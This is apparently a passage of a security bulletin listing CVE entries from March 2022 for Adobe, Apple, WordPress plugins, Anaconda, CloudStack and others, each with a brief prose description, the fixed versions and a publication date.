adobe — character_animator Adobe Character Animator version 4.4 (and earlier versions) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40769
MISC
adobe — character_animator Adobe Character Animator version 4.4 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40768
MISC
adobe — character_animator Adobe Character Animator version 4.4 (and earlier) is affected by an Access of Memory Location After End of Buffer vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40767
MISC
adobe — character_animator Adobe Character Animator version 4.4 (and earlier versions) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40766
MISC
adobe — character_animator Adobe Character Animator version 4.4 (and earlier) is affected by a memory corruption vulnerability when parsing an M4A file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40765
MISC
adobe — character_animator Adobe Character Animator version 4.4 (and earlier) is affected by a memory corruption vulnerability when parsing an M4A file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40764
MISC
adobe — character_animator Adobe Character Animator version 4.4 (and earlier) is affected by a memory corruption vulnerability when parsing a WAF file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40763
MISC
adobe — character_animator Adobe Character Animator version 4.4 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40762
MISC
adobe — media_encoder Adobe Media Encoder 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40782
MISC
adobe — media_encoder Adobe Media Encoder 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40781
MISC
adobe — media_encoder Adobe Media Encoder version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40780
MISC
adobe — media_encoder Adobe Media Encoder version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40779
MISC
adobe — media_encoder Adobe Media Encoder 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40778
MISC
adobe — media_encoder Adobe Media Encoder version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40777
MISC
adobe — premiere_elements Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40787
MISC
adobe — premiere_elements Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40786
MISC
adobe — premiere_elements Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40788
MISC
adobe — premiere_elements Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40789
MISC
adobe — premiere_elements Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-42527
MISC
adobe — premiere_elements Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40785
MISC
adobe — premiere_elements Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-42526
MISC
adobe — premiere_pro Adobe Premiere Pro version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40793
MISC
adobe — premiere_pro Adobe Premiere Pro 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40796
MISC
adobe — premiere_pro Adobe Premiere Pro 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-42264
MISC
adobe — premiere_pro Adobe Premiere Pro version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40792
MISC
adobe — premiere_pro Adobe Premiere Pro version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40794
MISC
adobe — premiere_pro Adobe Premiere Pro 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-42263
MISC
advanced_product_labels_for_woocommerce — advanced_product_labels_for_woocommerce The Advanced Product Labels for WooCommerce WordPress plugin before 1.2.3.7 does not sanitise and escape the tax_color_set_type parameter before outputting it back in the berocket_apl_color_listener AJAX action’s response, leading to a Reflected Cross-Site Scripting issue. 2022-03-14 not yet calculated CVE-2022-0399
CONFIRM
MISC
anaconda — anaconda3 Anaconda Anaconda3 through 2021.11.0.0 and Miniconda3 through 11.0.0.0 can create a world-writable directory under %PROGRAMDATA% and place that directory into the system PATH environment variable. Thus, for example, local users can gain privileges by placing a Trojan horse file into that directory. (This problem can only happen in a non-default installation. The person who installs the product must specify that it is being installed for all users. Also, the person who installs the product must specify that the system PATH should be changed.) 2022-03-17 not yet calculated CVE-2022-26526
MISC
MISC
MISC
apache — cloudstack Apache CloudStack prior to 4.16.1.0 used insecure random number generation for project invitation tokens. If a project invite is created based only on an email address, a random token is generated. An attacker with knowledge of the project ID and the fact that the invite is sent, could generate time deterministic tokens and brute force attempt to use them prior to the legitimate receiver accepting the invite. This feature is not enabled by default, the attacker is required to know or guess the project ID for the invite in addition to the invitation token, and the attacker would need to be an existing authorized user of CloudStack. 2022-03-15 not yet calculated CVE-2022-26779
MISC
MISC
MLIST
apple — ios_and_ipados A resource exhaustion issue was addressed with improved input validation. This issue is fixed in iOS 15.2.1 and iPadOS 15.2.1. Processing a maliciously crafted HomeKit accessory name may cause a denial of service. 2022-03-18 not yet calculated CVE-2022-22588
MISC
apple — macos_monterey A privacy issue existed in the handling of Contact cards. This was addressed with improved state management. This issue is fixed in macOS Monterey 12.3. A malicious application may be able to access information about a user’s contacts. 2022-03-18 not yet calculated CVE-2022-22644
MISC
apple — macos_monterey A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22591
MISC
apple — macos_monterey Multiple issues were addressed by updating to curl version 7.79.1. This issue is fixed in macOS Monterey 12.3. Multiple issues in curl. 2022-03-18 not yet calculated CVE-2022-22623
MISC
apple — macos_monterey An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22586
MISC
apple — macos_monterey This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. A person with access to a Mac may be able to bypass Login Window. 2022-03-18 not yet calculated CVE-2022-22647
MISC
MISC
MISC
apple — macos_monterey An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.3. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory. 2022-03-18 not yet calculated CVE-2022-22651
MISC
apple — macos_monterey This issue was addressed with a new entitlement. This issue is fixed in macOS Monterey 12.3. An app may be able to spoof system notifications and UI. 2022-03-18 not yet calculated CVE-2022-22660
MISC
apple — macos_monterey A logic issue was addressed with improved validation. This issue is fixed in macOS Monterey 12.3. A malicious application may be able to gain root privileges. 2022-03-18 not yet calculated CVE-2022-22665
MISC
apple — macos_monterey A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22669
MISC
apple — multiple_products The issue was addressed with additional permissions checks. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. A malicious application may be able to read other applications’ settings. 2022-03-18 not yet calculated CVE-2022-22609
MISC
MISC
MISC
MISC
apple — multiple_products A logic issue was addressed with improved state management. This issue is fixed in iOS 15.4 and iPadOS 15.4. An attacker in a privileged network position may be able to leak sensitive user information. 2022-03-18 not yet calculated CVE-2022-22659
MISC
apple — multiple_products A type confusion issue was addressed with improved state handling. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22661
MISC
MISC
MISC
apple — multiple_products An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Logic Pro 10.7.3, GarageBand 10.4.6, macOS Monterey 12.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22664
MISC
MISC
MISC
apple — multiple_products A memory corruption issue was addressed with improved validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, watchOS 8.5. Processing a maliciously crafted image may lead to heap corruption. 2022-03-18 not yet calculated CVE-2022-22666
MISC
MISC
MISC
apple — multiple_products A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.4 and iPadOS 15.4. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22667
MISC
apple — multiple_products An access issue was addressed with improved access restrictions. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, watchOS 8.5. A malicious application may be able to identify what other applications a user has installed. 2022-03-18 not yet calculated CVE-2022-22670
MISC
MISC
MISC
apple — multiple_products An authentication issue was addressed with improved state management. This issue is fixed in iOS 15.4 and iPadOS 15.4. A person with physical access to an iOS device may be able to access photos from the lock screen. 2022-03-18 not yet calculated CVE-2022-22671
MISC
apple — multiple_products This issue was addressed with improved checks. This issue is fixed in iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3. A user may send audio and video in a FaceTime call without knowing that they have done so. 2022-03-18 not yet calculated CVE-2022-22643
MISC
MISC
apple — multiple_products The issue was addressed with improved permissions logic. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. A malicious application may be able to bypass certain Privacy preferences. 2022-03-18 not yet calculated CVE-2022-22600
MISC
MISC
MISC
MISC
apple — multiple_products A user interface issue was addressed. This issue is fixed in watchOS 8.5, Safari 15.4. Visiting a malicious website may lead to address bar spoofing. 2022-03-18 not yet calculated CVE-2022-22654
MISC
MISC
apple — multiple_products A permissions issue was addressed with improved validation. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, macOS Monterey 12.3. A person with physical access to a device may be able to use Siri to obtain some location information from the lock screen. 2022-03-18 not yet calculated CVE-2022-22599
MISC
MISC
MISC
MISC
apple — multiple_products An issue with app access to camera metadata was addressed with improved logic. This issue is fixed in iOS 15.4 and iPadOS 15.4. An app may be able to learn information about the current camera view before being granted camera access. 2022-03-18 not yet calculated CVE-2022-22598
MISC
apple — multiple_products A memory corruption issue was addressed with improved validation. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted file may lead to arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22597
MISC
MISC
MISC
apple — multiple_products A memory corruption issue was addressed with improved validation. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22596
MISC
MISC
apple — multiple_products A cross-origin issue in the IndexDB API was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. A website may be able to track sensitive user information. 2022-03-18 not yet calculated CVE-2022-22594
MISC
MISC
MISC
MISC
MISC
apple — multiple_products A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Security Update 2022-001 Catalina, macOS Monterey 12.2, macOS Big Sur 11.6.3. A malicious application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22593
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products A logic issue was addressed with improved state management. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing maliciously crafted web content may prevent Content Security Policy from being enforced. 2022-03-18 not yet calculated CVE-2022-22592
MISC
MISC
MISC
MISC
MISC
apple — multiple_products A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing maliciously crafted web content may lead to arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22590
MISC
MISC
MISC
MISC
MISC
apple — multiple_products A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, macOS Big Sur 11.6.3, macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited. 2022-03-18 not yet calculated CVE-2022-22587
MISC
MISC
MISC
apple — multiple_products An issue existed within the path validation logic for symlinks. This issue was addressed with improved path sanitization. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, macOS Monterey 12.2, macOS Big Sur 11.6.3. An application may be able to access a user’s files. 2022-03-18 not yet calculated CVE-2022-22585
MISC
MISC
MISC
MISC
MISC
apple — multiple_products A memory corruption issue was addressed with improved validation. This issue is fixed in tvOS 15.3, iOS 15.3 and iPadOS 15.3, watchOS 8.4, macOS Monterey 12.2. Processing a maliciously crafted file may lead to arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22584
MISC
MISC
MISC
MISC
apple — multiple_products A permissions issue was addressed with improved validation. This issue is fixed in Security Update 2022-001 Catalina, macOS Monterey 12.2, macOS Big Sur 11.6.3. An application may be able to access restricted files. 2022-03-18 not yet calculated CVE-2022-22583
MISC
MISC
MISC
apple — multiple_products An information disclosure issue was addressed with improved state management. This issue is fixed in iOS 15.3 and iPadOS 15.3, tvOS 15.3, Security Update 2022-001 Catalina, macOS Monterey 12.2, macOS Big Sur 11.6.3. Processing a maliciously crafted STL file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22579
MISC
MISC
MISC
MISC
MISC
apple — multiple_products A memory initialization issue was addressed with improved memory handling. This issue is fixed in Logic Pro 10.7.3, GarageBand 10.4.6, macOS Monterey 12.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22657
MISC
MISC
MISC
apple — multiple_products A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22614
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products A logic issue was addressed with improved restrictions. This issue is fixed in iOS 15.4 and iPadOS 15.4. A malicious website may be able to access information about the user and their devices. 2022-03-18 not yet calculated CVE-2022-22653
MISC
apple — multiple_products An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory. 2022-03-18 not yet calculated CVE-2022-22627
MISC
MISC
MISC
apple — multiple_products A buffer overflow was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4. A malicious application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22634
MISC
MISC
apple — multiple_products An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4. An application may be able to gain elevated privileges. 2022-03-18 not yet calculated CVE-2022-22635
MISC
MISC
apple — multiple_products An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22636
MISC
MISC
apple — multiple_products This issue was addressed with improved checks. This issue is fixed in iOS 15.4 and iPadOS 15.4. A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions. 2022-03-18 not yet calculated CVE-2022-22622
MISC
apple — multiple_products This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to read restricted memory. 2022-03-18 not yet calculated CVE-2022-22648
MISC
MISC
MISC
apple — multiple_products An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to gain elevated privileges. 2022-03-18 not yet calculated CVE-2022-22631
MISC
MISC
MISC
apple — multiple_products A null pointer dereference was addressed with improved validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An attacker in a privileged position may be able to perform a denial of service attack. 2022-03-18 not yet calculated CVE-2022-22638
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products A logic issue was addressed with improved state management. This issue is fixed in iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3. An application may be able to gain elevated privileges. 2022-03-18 not yet calculated CVE-2022-22639
MISC
MISC
apple — multiple_products A memory corruption issue was addressed with improved validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22640
MISC
MISC
MISC
MISC
apple — multiple_products A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3. An application may be able to gain elevated privileges. 2022-03-18 not yet calculated CVE-2022-22641
MISC
MISC
MISC
apple — multiple_products This issue was addressed with improved checks. This issue is fixed in iOS 15.4 and iPadOS 15.4. A user may be able to bypass the Emergency SOS passcode prompt. 2022-03-18 not yet calculated CVE-2022-22642
MISC
apple — multiple_products A logic issue was addressed with improved state management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, watchOS 8.5, macOS Monterey 12.3. A malicious application may be able to elevate privileges. 2022-03-18 not yet calculated CVE-2022-22632
MISC
MISC
MISC
MISC
MISC
apple — multiple_products A memory corruption issue was addressed with improved state management. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, macOS Monterey 12.3. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22633
MISC
MISC
MISC
MISC
apple — multiple_products This issue was addressed with improved checks. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions. 2022-03-18 not yet calculated CVE-2022-22621
MISC
MISC
MISC
MISC
apple — multiple_products A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. 2022-03-18 not yet calculated CVE-2022-22620
MISC
MISC
MISC
apple — multiple_products This issue was addressed with improved checks. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4. A user may be able to bypass the Emergency SOS passcode prompt. 2022-03-18 not yet calculated CVE-2022-22618
MISC
MISC
apple — multiple_products A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to gain elevated privileges. 2022-03-18 not yet calculated CVE-2022-22617
MISC
MISC
MISC
apple — multiple_products A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22615
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory. 2022-03-18 not yet calculated CVE-2022-22626
MISC
MISC
MISC
apple — multiple_products An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory. 2022-03-18 not yet calculated CVE-2022-22625
MISC
MISC
MISC
apple — multiple_products A memory consumption issue was addressed with improved memory handling. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, iTunes 12.12.3 for Windows, watchOS 8.5, macOS Monterey 12.3. Processing a maliciously crafted image may lead to heap corruption. 2022-03-18 not yet calculated CVE-2022-22612
MISC
MISC
MISC
MISC
MISC
apple — multiple_products An out-of-bounds read was addressed with improved input validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, iTunes 12.12.3 for Windows, watchOS 8.5, macOS Monterey 12.3. Processing a maliciously crafted image may lead to arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22611
MISC
MISC
MISC
MISC
MISC
apple — multiple_products This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. A plug-in may be able to inherit the application’s permissions and access user data. 2022-03-18 not yet calculated CVE-2022-22650
MISC
MISC
MISC
apple — multiple_products The GSMA authentication panel could be presented on the lock screen. The issue was resolved by requiring device unlock to interact with the GSMA authentication panel. This issue is fixed in iOS 15.4 and iPadOS 15.4. A person with physical access may be able to view and modify the carrier account information and settings from the lock screen. 2022-03-18 not yet calculated CVE-2022-22652
MISC
apple — multiple_products An authentication issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen. 2022-03-18 not yet calculated CVE-2022-22656
MISC
MISC
MISC
apple — multiple_products An out-of-bounds write was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.4, iOS 14.6 and iPadOS 14.6, watchOS 7.5, tvOS 14.6. Processing a maliciously crafted font file may lead to arbitrary code execution. 2022-03-18 not yet calculated CVE-2021-30771
MISC
MISC
MISC
MISC
apple — multiple_products A validation issue was addressed with improved input sanitization. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing a maliciously crafted mail message may lead to running arbitrary javascript. 2022-03-18 not yet calculated CVE-2022-22589
MISC
MISC
MISC
MISC
MISC
apple — multiple_products A logic issue was addressed with improved validation. This issue is fixed in tvOS 15.3, iOS 15.3 and iPadOS 15.3, watchOS 8.4, macOS Monterey 12.2. A malicious application may be able to gain root privileges. 2022-03-18 not yet calculated CVE-2022-22578
MISC
MISC
MISC
MISC
apple — multiple_products An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22613
MISC
MISC
MISC
MISC
MISC
MISC
apple — xcode An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22602
MISC
apple — xcode An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22607
MISC
apple — xcode An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22606
MISC
apple — xcode An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22605
MISC
apple — xcode An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22604
MISC
apple — xcode An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22603
MISC
apple — xcode An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22608
MISC
apple — xcode An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22601
MISC
archivista — dms Cross-site Scripting (XSS) vulnerability in ArchivistaBox webclient allows an attacker to craft a malicious link, executing JavaScript in the context of a victim’s browser. This issue affects all ArchivistaBox versions prior to 2022/I. 2022-03-16 not yet calculated CVE-2021-42552
CONFIRM
argencoders-notevil — argencoders-notevil This affects all versions of package notevil; all versions of package argencoders-notevil. It is vulnerable to Sandbox Escape leading to Prototype pollution. The package fails to restrict access to the main context, allowing an attacker to add or modify an object’s prototype. **Note:** This vulnerability derives from an incomplete fix in [SNYK-JS-NOTEVIL-608878](https://security.snyk.io/vuln/SNYK-JS-NOTEVIL-608878). 2022-03-17 not yet calculated CVE-2021-23771
MISC
MISC
ari_fancy_lightbox — ari_fancy_lightbox The ARI Fancy Lightbox WordPress plugin before 1.3.9 does not sanitise and escape the msg parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting. 2022-03-14 not yet calculated CVE-2022-0161
MISC
CONFIRM
